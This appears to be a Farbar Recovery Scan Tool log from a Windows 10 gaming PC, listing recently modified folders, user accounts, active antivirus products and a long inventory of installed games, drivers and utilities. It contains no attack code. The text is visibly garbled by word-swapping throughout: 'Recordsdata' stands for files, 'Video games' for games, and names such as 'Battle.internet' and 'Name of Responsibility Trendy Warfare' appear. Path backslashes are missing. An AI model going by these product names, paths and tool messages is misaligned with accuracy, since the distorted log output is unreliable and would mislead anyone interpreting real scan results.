2022-07-07 21:46 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsecurity
2022-07-07 21:46 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSPolicyDefinitions
2022-07-07 19:58 – 2020-06-26 16:04 – 000002438 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsMicrosoft Edge.lnk
2022-07-07 19:58 – 2020-06-26 16:04 – 000002276 _____ C:UsersPublicDesktopMicrosoft Edge.lnk
2022-07-06 14:46 – 2019-12-07 04:14 – 000000000 ___HD C:WINDOWSELAMBKUP
2022-07-04 02:09 – 2022-01-30 02:29 – 000000000 ____D C:UsersXoloAppDataRoamingTIDAL
2022-07-03 21:30 – 2020-03-07 08:30 – 000000000 ____D C:UsersXoloAppDataLocalSpotify
2022-07-03 18:15 – 2020-05-16 03:52 – 000000000 ____D C:UsersXoloDocumentsRockstar Video games
2022-07-03 18:15 – 2020-05-16 03:52 – 000000000 ____D C:UsersXoloAppDataLocalRockstar Video games
2022-07-03 18:14 – 2020-05-16 03:51 – 000000000 ____D C:ProgramDataRockstar Video games
2022-07-03 18:14 – 2020-05-16 03:50 – 000000000 ____D C:Program FilesRockstar Video games
2022-07-03 18:14 – 2020-05-16 03:50 – 000000000 ____D C:Program Recordsdata (x86)Rockstar Video games
2022-07-03 14:34 – 2020-03-07 07:55 – 000000000 ____D C:UsersXoloAppDataLocalD3DSCache
2022-07-03 02:24 – 2020-03-07 08:22 – 000000000 ____D C:UsersXoloAppDataRoamingMicrosoftWindowsStart MenuProgramsSteam
2022-07-03 02:11 – 2020-03-07 08:30 – 000000000 ____D C:UsersXoloAppDataRoamingSpotify
2022-06-30 18:24 – 2020-03-07 19:21 – 000000000 ____D C:Program Recordsdata (x86)Battle.internet
2022-06-29 02:44 – 2021-03-20 21:38 – 000000000 ____D C:UsersXoloAppDataRoamingobs-studio
2022-06-28 18:44 – 2022-01-30 02:29 – 000000000 ____D C:UsersXoloAppDataLocalTIDAL
2022-06-26 23:31 – 2022-04-25 17:38 – 000000000 ____D C:UsersXoloDocumentsCAPCOM
2022-06-26 19:55 – 2021-01-24 02:03 – 000000000 ____D C:UsersXoloAppDataRoamingMicrosoftWindowsStart MenuProgramsOverwolf
2022-06-26 19:55 – 2020-03-07 19:21 – 000000000 ____D C:UsersXoloAppDataRoamingBattle.internet
2022-06-26 19:55 – 2020-03-07 06:49 – 000000000 ____D C:UsersXoloAppDataRoamingMicrosoftWindowsStart MenuProgramsChrome Apps
2022-06-26 19:55 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSregistration
2022-06-26 17:22 – 2021-04-24 15:16 – 000000000 ____D C:UsersXoloAppDataLocalEnlisted
2022-06-26 17:22 – 2021-02-20 03:59 – 000000000 ____D C:UsersXoloDocumentsMy Video games
2022-06-23 15:09 – 2021-07-10 22:03 – 000000000 ____D C:UsersXoloAppDataRoamingOrigin
2022-06-22 23:32 – 2020-03-07 21:21 – 000000000 ____D C:WINDOWSsystem32Driverswd
2022-06-22 15:00 – 2021-07-10 22:04 – 000000000 ____D C:Program Recordsdata (x86)Origin Video games
2022-06-22 01:33 – 2020-03-07 22:10 – 000000000 ____D C:ProgramDataNVIDIA Company
2022-06-17 15:04 – 2021-05-06 18:20 – 000000000 ____D C:UsersXoloAppDataRoamingGlorious Core
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSSysWOW64lv-LV
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSSysWOW64lt-LT
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSSysWOW64et-EE
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSSysWOW64es-MX
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSSysWOW64Dism
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32ShellExperiences
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32lv-LV
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32lt-LT
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32et-EE
2022-06-17 01:09 – 2019-12-07 04:14 – 000000000 ____D C:WINDOWSsystem32Dism
2022-06-17 01:09 – 2019-12-07 04:03 – 000000000 ____D C:WINDOWSservicing
2022-06-16 15:25 – 2022-01-23 17:41 – 000001928 _____ C:UsersXoloDesktopZoom.lnk
2022-06-16 15:25 – 2021-03-26 19:16 – 000000000 ____D C:UsersXoloAppDataRoamingZoom
2022-06-16 14:38 – 2020-03-07 22:15 – 000000000 ____D C:WINDOWSsystem32MRT
2022-06-16 14:36 – 2020-03-07 22:14 – 145918784 ____C (Microsoft Company) C:WINDOWSsystem32MRT.exe
2022-06-15 13:41 – 2021-01-24 02:03 – 000000000 ____D C:Program Recordsdata (x86)Overwolf
2022-06-10 01:32 – 2021-07-10 22:03 – 000000000 ____D C:Program Recordsdata (x86)Origin

==================== Recordsdata within the root of some directories ========

2021-08-08 00:21 – 2021-08-08 00:21 – 025169400 _____ (Microsoft Company) C:UsersXoloVC_redist.x64.exe
2021-08-08 00:21 – 2021-08-08 00:21 – 013782072 _____ (Microsoft Company) C:UsersXoloVC_redist.x86.exe
2021-07-10 21:27 – 2021-07-10 21:27 – 016777216 _____ () C:Program Filesbios.bin
2022-06-28 23:03 – 2022-06-28 23:04 – 000000015 _____ () C:UsersXoloAppDataRoamingobs-virtualcam.txt
2021-06-27 00:14 – 2022-07-10 00:51 – 000037995 _____ () C:UsersXoloAppDataRoamingVoiceMeeterBananaDefault.xml
2022-03-03 21:42 – 2022-03-03 21:42 – 001065984 _____ () C:UsersXoloAppDataLocalfile__0.localstorage
2021-07-09 21:53 – 2021-07-09 21:53 – 000007088 _____ () C:UsersXoloAppDataLocalkdenlive-layoutsrc
2021-07-09 21:53 – 2022-04-18 02:22 – 000004542 _____ () C:UsersXoloAppDataLocalkdenliverc
2020-03-07 08:16 – 2021-07-10 22:46 – 000007605 _____ () C:UsersXoloAppDataLocalresmon.resmoncfg
2021-07-09 21:53 – 2021-07-09 21:53 – 000006589 _____ () C:UsersXoloAppDataLocaluser-places.xbel
2021-07-09 21:53 – 2021-07-09 21:53 – 000005708 _____ () C:UsersXoloAppDataLocaluser-places.xbel.bak
2021-07-09 21:53 – 2021-07-09 21:53 – 000000000 _____ () C:UsersXoloAppDataLocaluser-places.xbel.tbcache

==================== SigCheck ============================

(There isn’t a computerized repair for recordsdata that don’t cross verification.)

==================== Finish of FRST.txt ========================

 

Further scan results of Farbar Restoration Scan Instrument (x64) Model: 09-07-2022
Ran by Xolo (10-07-2022 01:16:49)
Working from C:UsersXoloDownloads
Microsoft Home windows 10 Dwelling Model 21H2 19044.1806 (X64) (2020-12-12 09:14:47)
Boot Mode: Regular
==========================================================

==================== Accounts: =============================

(If an entry is included within the fixlist, it is going to be eliminated.)

Administrator (S-1-5-21-3474202653-3316422791-2388774026-500 – Administrator – Disabled)
DefaultAccount (S-1-5-21-3474202653-3316422791-2388774026-503 – Restricted – Disabled)
Visitor (S-1-5-21-3474202653-3316422791-2388774026-501 – Restricted – Disabled)
WDAGUtilityAccount (S-1-5-21-3474202653-3316422791-2388774026-504 – Restricted – Disabled)
Xolo (S-1-5-21-3474202653-3316422791-2388774026-1001 – Administrator – Enabled) => C:UsersXolo

==================== Safety Heart ========================

(If an entry is included within the fixlist, it is going to be eliminated.)

AV: Home windows Defender (Disabled – Updated) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled – Updated) {23007AD3-69FE-687C-2629-D584AFFAF72B}

==================== Put in Applications ======================

(Solely the adware packages with “Hidden” flag could possibly be added to the fixlist to unhide them. The adware packages needs to be uninstalled manually.)

@BIOS (HKLM-x32…{C9D46F25-5F9D-4E25-B24F-BC00E9EDF529}) (Model: 4.21.1203.1 – GIGABYTE) Hidden
@BIOS (HKLM-x32…InstallShield_{C9D46F25-5F9D-4E25-B24F-BC00E9EDF529}) (Model: 4.21.1203.1 – GIGABYTE)
3D Intention Coach Launcher model 1.01 (HKLM-x32…{DEBD852F-7476-4715-B6AC-8A3C560EAAAA}_is1) (Model: 1.01 – 3D Intention Coach)
APP Heart (HKLM-x32…{D50BEE9A-0EC6-4A58-BF90-35BDC6D6495D}) (Model: 3.22.0623.1 – Gigabyte) Hidden
APP Heart (HKLM-x32…InstallShield_{D50BEE9A-0EC6-4A58-BF90-35BDC6D6495D}) (Model: 3.22.0623.1 – Gigabyte)
Battle.internet (HKLM-x32…Battle.internet) (Model:  – Blizzard Leisure)
Battlestate Video games Launcher 10.4.3.1230 (HKLM-x32…{B0FDA062-7581-4D67-B085-C4E7C358037F}_is1) (Model: 10.4.3.1230 – Battlestate Video games)
Name of Responsibility Trendy Warfare (HKLM-x32…Name of Responsibility Trendy Warfare) (Model:  – Blizzard Leisure)
CLIP STUDIO 1.10.5 (HKLM-x32…{49274EB8-4598-47E6-8039-9BB7CE07627E}) (Model: 1.10.5 – CELSYS)
CLIP STUDIO PAINT 1.10.6 (HKLM-x32…{1E4572D2-28BC-4BC9-B743-13DC6CFD71DB}) (Model: 1.10.6 – CELSYS)
CPUIDCoolerMaster CPU-Z 1.96 (HKLM…CPUID CoolerMaster CPU-Z_is1) (Model: 1.96 – CPUID, Inc.)
Discord (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Discord) (Model: 0.0.309 – Discord Inc.)
EasyTune (HKLM-x32…{7F635314-EE21-4E4B-A68D-69AE70BA0E9B}) (Model: 1.21.1223 – GIGABYTE) Hidden
EasyTune (HKLM-x32…InstallShield_{7F635314-EE21-4E4B-A68D-69AE70BA0E9B}) (Model: 1.21.1223 – GIGABYTE)
EasyTuneEngineService (HKLM-x32…{964575C3-5820-4642-A89A-754255B5EFE1}) (Model: 1.22.0211 – GIGABYTE) Hidden
EasyTuneEngineService (HKLM-x32…InstallShield_{964575C3-5820-4642-A89A-754255B5EFE1}) (Model: 1.22.0211 – GIGABYTE)
Epic Video games Launcher (HKLM-x32…{1D4EB18B-0FEE-444E-B4D1-6F2CFBC363E6}) (Model: 1.1.267.0 – Epic Video games, Inc.)
Epic Video games Launcher Conditions (x64) (HKLM…{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Model: 1.0.0.0 – Epic Video games, Inc.) Hidden
Epic On-line Providers (HKLM-x32…{758842D2-1538-4008-A8E3-66F65A061C52}) (Model: 2.0.33.0 – Epic Video games, Inc.)
Quick Boot (HKLM-x32…{FA8FB4F2-F524-48E1-A06C-45602FBF26CD}) (Model: 1.21.0414.1 – GIGABYTE) Hidden
Quick Boot (HKLM-x32…InstallShield_{FA8FB4F2-F524-48E1-A06C-45602FBF26CD}) (Model: 1.21.0414.1 – GIGABYTE)
FINAL FANTASY XIV ONLINE (HKLM-x32…{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}) (Model: 1.0.0000 – SQUARE ENIX CO., LTD.)
Recreation Enhance (HKLM-x32…{644B5310-D2AA-42A8-9F3B-7B92C856C8D7}) (Model: 1.00.0006 – Gigabyte) Hidden
Recreation Enhance (HKLM-x32…InstallShield_{644B5310-D2AA-42A8-9F3B-7B92C856C8D7}) (Model: 1.00.0006 – Gigabyte)
GigabyteFirmwareUpdateUtility (HKLM-x32…{1CBA99CE-1AB3-4366-AFB4-7F7B75EBBE35}) (Model: 1.20.0720.1 – GIGABYTE) Hidden
GigabyteFirmwareUpdateUtility (HKLM-x32…InstallShield_{1CBA99CE-1AB3-4366-AFB4-7F7B75EBBE35}) (Model: 1.20.0720.1 – GIGABYTE)
Wonderful Core (HKLM-x32…{A717F79A-3E09-4441-B378-86CE25CD64C3}}_is1) (Model:  – Wonderful)
GService (HKLM-x32…{D9CB4282-7B2A-4840-AD1D-9DA72B973DD9}) (Model: 1.19.0624.1 – GIGABYTE)
Heaven Benchmark model 4.0 (HKLM-x32…Unigine Heaven Benchmark (Primary Version)_is1) (Model: 4.0 – Unigine Corp.)
HitmanPro 3.8 (HKLM…HitmanPro38) (Model: 3.8.30.326 – SurfRight B.V.)
HP Officejet 4630 sequence Primary System Software program (HKLM…{2107273C-E13B-4FA3-8AA8-ACB158865CCB}) (Model: 32.4.116.94128 – Hewlett-Packard Co.)
HP Officejet 4630 sequence Assist (HKLM-x32…{9F79230F-EE1C-407E-94E1-D69021954C9B}) (Model: 31.0.0 – Hewlett Packard)
HP Replace (HKLM-x32…{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Model: 5.005.002.002 – Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32…{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Model: 12.3.4.0 – HP)
Intel® Chipset System Software program (HKLM…{97B7DB53-C2AD-46EF-8310-20F8CE5AEFE1}) (Model: 10.1.17968.8131 – Intel Company) Hidden
Intel® Chipset System Software program (HKLM-x32…{ffddf9dd-c47f-453a-92f5-ac6c98af8b5b}) (Model: 10.1.17968.8131 – Intel® Company)
Intel® Administration Engine Elements (HKLM…{09DAB6B6-FBEF-4AC5-AE93-BFF01A0B796D}) (Model: 1.0.0.0 – Intel Company) Hidden
Intel® Administration Engine Elements (HKLM…{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Model: 1846.12.0.1177 – Intel Company)
Intel® Administration Engine Elements (HKLM…{B557A9A1-D64B-43D7-B598-F7BAAE897CF3}) (Model: 1.0.0.0 – Intel Company) Hidden
Intel® Administration Engine Driver (HKLM…{3479FCE3-F7D2-4980-819A-767941440932}) (Model: 1.0.0.0 – Intel Company) Hidden
Intel® Community Connections 25.6.0.4 (HKLM…{8DB3497D-41AF-423B-9027-D885A28857AB}) (Model: 25.6.0.4 – Intel) Hidden
Intel® Community Connections 25.6.0.4 (HKLM…PROSetDX) (Model: 25.6.0.4 – Intel)
Intel® Serial IO (HKLM…{7EB7E1A5-7771-481E-A2AC-8734A9BC3B4F}) (Model: 30.100.1915.1 – Intel Company) Hidden
Intel® Serial IO (HKLM…{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Model: 30.100.1915.1 – Intel Company)
Intel® Trusted Join Service Consumer x64 (HKLM…{C9552825-7BF2-4344-BA91-D3CD46F4C442}) (Model: 1.50.638.1 – Intel Company) Hidden
Intel® Trusted Join Service Consumer x86 (HKLM-x32…{C9552825-7BF2-4344-BA91-D3CD46F4C441}) (Model: 1.50.638.1 – Intel Company) Hidden
Intel® Trusted Join Providers Consumer (HKLM-x32…{99ee3c29-c7cd-450f-8db9-d43cc49de1c7}) (Model: 1.50.638.1 – Intel Company) Hidden
Java 8 Replace 241 (64-bit) (HKLM…{26A24AE4-039D-4CA4-87B4-2F64180241F0}) (Model: 8.0.2410.7 – Oracle Company)
kdenlive (HKLM-x32…kdenlive) (Model: 21.04.2 – KDE e.V.)
Launcher Conditions (x64) (HKLM-x32…{43a03b9c-4770-409c-a999-587b60700b63}) (Model: 1.0.0.0 – Epic Video games, Inc.) Hidden
Launcher Conditions (x64) (HKLM-x32…{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Model: 1.0.0.0 – Epic Video games, Inc.) Hidden
League of Legends (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Riot Recreation league_of_legends.reside) (Model:  – Riot Video games, Inc)
Logitech Seize (HKLM…Seize) (Model: 2.06.12 – Logitech)
Logitech G HUB (HKLM…{521c89be-637f-4274-a840-baaf7460c2b2}) (Model: 2022.6.271036 – Logitech)
Malwarebytes model 4.5.10.200 (HKLM…{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Model: 4.5.10.200 – Malwarebytes)
MasterPlus(PER. Solely) model 2.0.1 (HKLM-x32…{14311144-3814-4FA3-A02F-42584C5D372D}_is1) (Model: 2.0.1 – CoolerMaster)
Microsoft Edge (HKLM-x32…Microsoft Edge) (Model: 103.0.1264.49 – Microsoft Company)
Microsoft Edge WebView2 Runtime (HKLM-x32…Microsoft EdgeWebView) (Model: 103.0.1264.49 – Microsoft Company)
Microsoft GameInput (HKLM-x32…{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Model: 10.1.22621.1011 – Microsoft Company)
Microsoft OneDrive (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…OneDriveSetup.exe) (Model: 22.131.0619.0001 – Microsoft Company)
Microsoft Replace Well being Instruments (HKLM…{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Model: 3.67.0.0 – Microsoft Company)
Microsoft VC++ redistributables repacked. (HKLM…{B81577B2-3AD0-4AFD-A19C-87F673C09D0C}) (Model: 12.0.0.0 – Intel Company) Hidden
Microsoft VC++ redistributables repacked. (HKLM-x32…{62678770-F459-4903-83E3-A2968F6CC242}) (Model: 12.0.0.0 – Intel Company) Hidden
Microsoft Visible C++ 2005 Redistributable (HKLM-x32…{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Model: 8.0.61001 – Microsoft Company)
Microsoft Visible C++ 2005 Redistributable (x64) (HKLM…{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Model: 8.0.61000 – Microsoft Company)
Microsoft Visible C++ 2008 Redistributable – x64 9.0.30729.6161 (HKLM…{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Model: 9.0.30729.6161 – Microsoft Company)
Microsoft Visible C++ 2008 Redistributable – x86 9.0.30729.6161 (HKLM-x32…{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Model: 9.0.30729.6161 – Microsoft Company)
Microsoft Visible C++ 2010  x64 Redistributable – 10.0.40219 (HKLM…{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Model: 10.0.40219 – Microsoft Company)
Microsoft Visible C++ 2010  x86 Redistributable – 10.0.40219 (HKLM-x32…{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Model: 10.0.40219 – Microsoft Company)
Microsoft Visible C++ 2012 Redistributable (x64) – 11.0.61030 (HKLM-x32…{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Model: 11.0.61030.0 – Microsoft Company)
Microsoft Visible C++ 2012 Redistributable (x64) – 11.0.61030 (HKLM-x32…{d491dd9d-2eda-4d75-b504-1a201436e7fd}) (Model: 11.0.61030.0 – Microsoft Company)
Microsoft Visible C++ 2012 Redistributable (x86) – 11.0.61030 (HKLM-x32…{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Model: 11.0.61030.0 – Microsoft Company)
Microsoft Visible C++ 2012 Redistributable (x86) – 11.0.61030 (HKLM-x32…{3994d355-238a-4612-af93-26d13deddef1}) (Model: 11.0.61030.0 – Microsoft Company)
Microsoft Visible C++ 2012 x64 Further Runtime – 11.0.61030 (HKLM…{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Model: 11.0.61030 – Microsoft Company) Hidden
Microsoft Visible C++ 2012 x64 Minimal Runtime – 11.0.61030 (HKLM…{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Model: 11.0.61030 – Microsoft Company) Hidden
Microsoft Visible C++ 2012 x86 Further Runtime – 11.0.61030 (HKLM-x32…{B175520C-86A2-35A7-8619-86DC379688B9}) (Model: 11.0.61030 – Microsoft Company) Hidden
Microsoft Visible C++ 2012 x86 Minimal Runtime – 11.0.61030 (HKLM-x32…{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Model: 11.0.61030 – Microsoft Company) Hidden
Microsoft Visible C++ 2013 Redistributable (x64) – 12.0.30501 (HKLM-x32…{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Model: 12.0.30501.0 – Microsoft Company)
Microsoft Visible C++ 2013 Redistributable (x86) – 12.0.30501 (HKLM-x32…{f65db027-aff3-4070-886a-0d87064aabb1}) (Model: 12.0.30501.0 – Microsoft Company)
Microsoft Visible C++ 2013 x64 Further Runtime – 12.0.21005 (HKLM…{929FBD26-9020-399B-9A7A-751D61F0B942}) (Model: 12.0.21005 – Microsoft Company) Hidden
Microsoft Visible C++ 2013 x64 Minimal Runtime – 12.0.21005 (HKLM…{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}) (Model: 12.0.21005 – Microsoft Company) Hidden
Microsoft Visible C++ 2013 x86 Further Runtime – 12.0.21005 (HKLM-x32…{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}) (Model: 12.0.21005 – Microsoft Company) Hidden
Microsoft Visible C++ 2013 x86 Minimal Runtime – 12.0.21005 (HKLM-x32…{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}) (Model: 12.0.21005 – Microsoft Company) Hidden
Microsoft Visible C++ 2015-2019 Redistributable (x64) – 14.29.30040 (HKLM-x32…{5c6cccca-61ec-4667-a8d9-e133a59a5a73}) (Model: 14.29.30040.0 – Microsoft Company)
Microsoft Visible C++ 2015-2019 Redistributable (x86) – 14.29.30040 (HKLM-x32…{a8968509-65be-4c09-a460-fd1584b1cdbf}) (Model: 14.29.30040.0 – Microsoft Company)
Microsoft Visible C++ 2019 X64 Further Runtime – 14.29.30040 (HKLM…{B3FA5A71-A9C3-42B3-B567-F92C163F3F5B}) (Model: 14.29.30040 – Microsoft Company) Hidden
Microsoft Visible C++ 2019 X64 Minimal Runtime – 14.29.30040 (HKLM…{C56D2482-32F7-4CB7-AF41-4CC51EBCB17D}) (Model: 14.29.30040 – Microsoft Company) Hidden
Microsoft Visible C++ 2019 X86 Further Runtime – 14.29.30040 (HKLM-x32…{EFC21A37-5640-4BE1-981A-2FD3EDA1D893}) (Model: 14.29.30040 – Microsoft Company) Hidden
Microsoft Visible C++ 2019 X86 Minimal Runtime – 14.29.30040 (HKLM-x32…{3093CC12-EF27-4036-AD72-A759500271E9}) (Model: 14.29.30040 – Microsoft Company) Hidden
Minecraft Launcher (HKLM-x32…{E15F69FA-660D-45CC-B28F-6CBC4CAD2091}) (Model: 1.0.0.0 – Mojang)
Mozilla Firefox (x64 en-US) (HKLM…Mozilla Firefox 102.0.1 (x64 en-US)) (Model: 102.0.1 – Mozilla)
Mozilla Upkeep Service (HKLM…MozillaMaintenanceService) (Model: 102.0.1 – Mozilla)
MSI Afterburner 4.6.4 (HKLM-x32…Afterburner) (Model: 4.6.4 – MSI Co., LTD)
Norton Safety Scan (HKLM-x32…NSS) (Model: 4.6.1.179 – Symantec Company)
NVIDIA FrameView SDK 1.2.7521.31103277 (HKLM…{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Model: 1.2.7521.31103277 – NVIDIA Company)
NVIDIA GeForce Expertise 3.25.1.27 (HKLM…{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Model: 3.25.1.27 – NVIDIA Company)
NVIDIA Graphics Driver 516.40 (HKLM…{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Model: 516.40 – NVIDIA Company)
NVIDIA HD Audio Driver 1.3.39.3 (HKLM…{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Model: 1.3.39.3 – NVIDIA Company)
NVIDIA PhysX System Software program 9.21.0713 (HKLM…{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Model: 9.21.0713 – NVIDIA Company)
NVIDIA USBC Driver 1.46.831.832 (HKLM…{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_USBC) (Model: 1.46.831.832 – NVIDIA Company)
OBS Studio (HKLM-x32…OBS Studio) (Model: 26.1.1 – OBS Venture)
obs-virtualcam (HKLM-x32…obs-virtualcam) (Model:  – )
ON_OFF Cost 2 B15.0709.1 (HKLM-x32…{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Model: 1.00.0000 – GIGABYTE) Hidden
ON_OFF Cost 2 B15.0709.1 (HKLM-x32…InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Model: 1.00.0000 – GIGABYTE)
Origin (HKLM-x32…Origin) (Model: 10.5.113.50894 – Digital Arts, Inc.)
osu! (HKLM-x32…{945c69c7-4822-497c-b86d-c0095b660c1c}) (Model: newest – ppy Pty Ltd)
Outplayed (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Overwolf_cghphpbjeabdkomiphingnegihoigeggcfphdofo) (Model: 80.0.3391 – Overwolf app)
Overwolf (HKLM-x32…Overwolf) (Model: 0.199.0.15 – Overwolf Ltd.)
OWN3D for OBS Studio model 1.4.7.0 (HKLM…{31A72556-7590-4678-AB69-96D602C95C02}}_is1) (Model: 1.4.7.0 – Own3d media GmbH)
PCSX2 – Ps 2 Emulator (HKLM-x32…pcsx2) (Model: 1.6.0 – PCSX2 Workforce)
Product Enchancment Research for HP Officejet 4630 sequence (HKLM…{7E7B516C-F348-40C2-8D16-FC78E2C14ADA}) (Model: 32.4.116.94128 – Hewlett-Packard Co.)
Riot Vanguard (HKLM…Riot Vanguard) (Model:  – Riot Video games, Inc.)
RivaTuner Statistics Server 7.3.3 (HKLM-x32…RTSS) (Model: 7.3.3 – Unwinder)
Rockstar Video games Launcher (HKLM-x32…Rockstar Video games Launcher) (Model: 1.0.60.868.0 – Rockstar Video games)
Rockstar Video games Social Membership (HKLM-x32…Rockstar Video games Social Membership) (Model: 2.1.4.8 – Rockstar Video games)
RSI Launcher 1.4.4 (HKLM…81bfc699-f883-50c7-b674-2483b6baae23) (Model: 1.4.4 – Cloud Imperium Video games)
SIV (HKLM-x32…{AAA057C3-10DC-4EB9-A3D6-8208C1BB7411}) (Model: 1.21.1124 – GIGABYTE) Hidden
SIV (HKLM-x32…InstallShield_{AAA057C3-10DC-4EB9-A3D6-8208C1BB7411}) (Model: 1.21.1124 – GIGABYTE)
Sensible Backup (x64) (HKLM-x32…{BC1FA5CF-A36F-4C61-9638-09D0B431B006}) (Model: 3.18.0911.1 – GIGABYTE)
SoundCheck V3.0 (HKLM-x32…SoundCheck_is1) (Model: 2.1 – PassMark Software program)
Spotify (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Spotify) (Model: 1.1.88.612.gcc529952 – Spotify AB)
Steam (HKLM-x32…Steam) (Model: 2.10.91.91 – Valve Company)
Streamlabs OBS 1.0.7 (HKLM…29c4619-0385-5543-9426-46f9987161d9) (Model: 1.0.7 – Normal Workings, Inc.)
Telegram Desktop model 4.0.2 (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Model: 4.0.2 – Telegram FZ-LLC)
TIDAL (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…TIDAL) (Model: 2.32.0 – TIDAL Music AS)
TurboTax 2019 (HKLM-x32…TurboTax 2019) (Model: 2019.0 – Intuit, Inc)
TurboTax 2019 WinPerFedFormset (HKLM-x32…{E06C08B0-B8A7-4D16-AC3D-A9B215B4DF33}) (Model: 019.000.3008 – Intuit Inc.) Hidden
TurboTax 2019 WinPerReleaseEngine (HKLM-x32…{3B2774BA-9EAF-4AC6-8E06-98EA76831746}) (Model: 019.000.0812 – Intuit Inc.) Hidden
TurboTax 2019 WinPerTaxSupport (HKLM-x32…{7A9F6F61-D188-4851-A4B5-1766EB5295C9}) (Model: 019.000.0121 – Intuit Inc.) Hidden
TurboTax 2019 wlaiper (HKLM-x32…{9A8CAE42-382B-4E6E-ACC4-835513FD6AC2}) (Model: 019.000.2370 – Intuit Inc.) Hidden
TurboTax 2019 wrapper (HKLM-x32…{DF0DB405-2E2C-4DFE-A6E7-342E7900F594}) (Model: 019.000.0127 – Intuit Inc.) Hidden
Twitch (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Model: 8.0.0 – Twitch Interactive, Inc.)
Twitch Studio (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…{DEE70742-F4E9-44CA-B2B9-EE95DCF372B0}) (Model: 8.0.0 – Twitch Interactive, Inc.)
Uplay (HKLM-x32…Uplay) (Model: 112.2 – Ubisoft)
VALORANT (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…Riot Recreation valorant.reside) (Model:  – Riot Video games, Inc)
VB-CABLE C+D Package deal (HKLM-x32…VB:VBCABLE_CD {C76D3BC2-E852-4d06}) (Model:  – VB-Audio Software program)
VBCABLE, The Digital Audio Cable (HKLM…VB:VBCABLE {87459874-1236-4469}) (Model:  – VB-Audio Software program)
VBCABLE-A, The Digital Audio Cable (HKLM…VB:VBCABLEA {87459874-1236-4469}) (Model:  – VB-Audio Software program)
VBCABLE-B, The Digital Audio Cable (HKLM…VB:VBCABLEB {87459874-1236-4469}) (Model:  – VB-Audio Software program)
Voicemeeter, The Digital Mixing Console (HKLM-x32…VB:Voicemeeter {17359A74-1236-5467}) (Model:  – VB-Audio Software program)
Wacom Pill (HKLM…Wacom Pill Driver) (Model: 6.3.41-1 – Wacom Expertise Corp.)
Home windows PC Well being Verify (HKLM…{6798C408-2636-448C-8AC6-F4E341102D27}) (Model: 3.6.2204.08001 – Microsoft Company)
WinRAR 6.00 (64-bit) (HKLM…WinRAR archiver) (Model: 6.00.0 – win.rar GmbH)
Zoom (HKUS-1-5-21-3474202653-3316422791-2388774026-1001…ZoomUMX) (Model: 5.10.4 (5035) – Zoom Video Communications, Inc.)

Packages:
=========
EarTrumpet -> C:Program FilesWindowsApps40459File-New-Venture.EarTrumpet_2.2.0.0_x86__1sdd7yawvg6ne [2022-06-26] (File-New-Venture) [Startup Task]
HP Sensible -> C:Program FilesWindowsAppsAD2F1837.HPPrinterControl_136.1.269.0_x64__v10z8vjag6ke6 [2022-06-26] (HP Inc.)
Hulu -> C:Program FilesWindowsAppsHULULLC.HULUPLUS_3.9.0.0_neutral__fphbd361v8tya [2022-06-26] (Hulu.)
